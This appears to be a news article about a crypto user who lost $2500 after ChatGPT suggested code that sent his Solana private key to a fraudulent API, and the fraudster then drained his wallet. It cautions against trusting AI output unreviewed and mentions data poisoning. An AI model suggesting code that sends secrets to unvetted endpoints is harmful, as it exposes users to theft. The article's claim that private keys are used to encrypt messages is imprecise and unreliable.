Cryptocurrency Enthusiast Loses $2500 Due to Fraudulent API Suggested by ChatGPT

A cryptocurrency enthusiast reported on X that his attempt to program with ChatGPT cost him $2500. He wanted to create a “Bump Bot” using artificial intelligence to promote his tokens on a cryptocurrency trading platform on Discord servers. What he did not anticipate was that ChatGPT would suggest a fraudulent Solana API website. He explained that he used the code suggested by ChatGPT, which transmitted the private key via the API. Additionally, he used his main Solana wallet. “When you’re in a hurry and doing many things at once, it’s easy to make mistakes,” summarized the programmer, who goes by “r_ocky.eth”.

It seems “r_ocky.eth” is not well-versed in security or programming: private keys should never be shared, but used to encrypt messages. Software development should never be done with a “production account” but with a separate test account. The code snippet he shared even openly shows what he was doing: “Payload for POST request” is noted as a comment, immediately followed by the private key that programmers are supposed to enter.

The fraudster behind the API acted quickly, as the victim reported. Shortly after using the API, all his crypto assets were transferred from his wallet to the fraudster’s. This happened within 30 minutes after he made the request. He felt he had done something wrong, but he lost trust in OpenAI. He reported the chat history with the fraudulent program code to OpenAI. He also informed Github about the fraudulent repository, which was promptly removed.

There have been reports that OpenAI’s ChatGPT has been used for malware development. However, the idea that ChatGPT could generate harmful code due to “data poisoning” in its training data is not yet a widespread understanding. This example once again demonstrates that the results from AI should not be blindly trusted and should always be reviewed.

Exit mobile version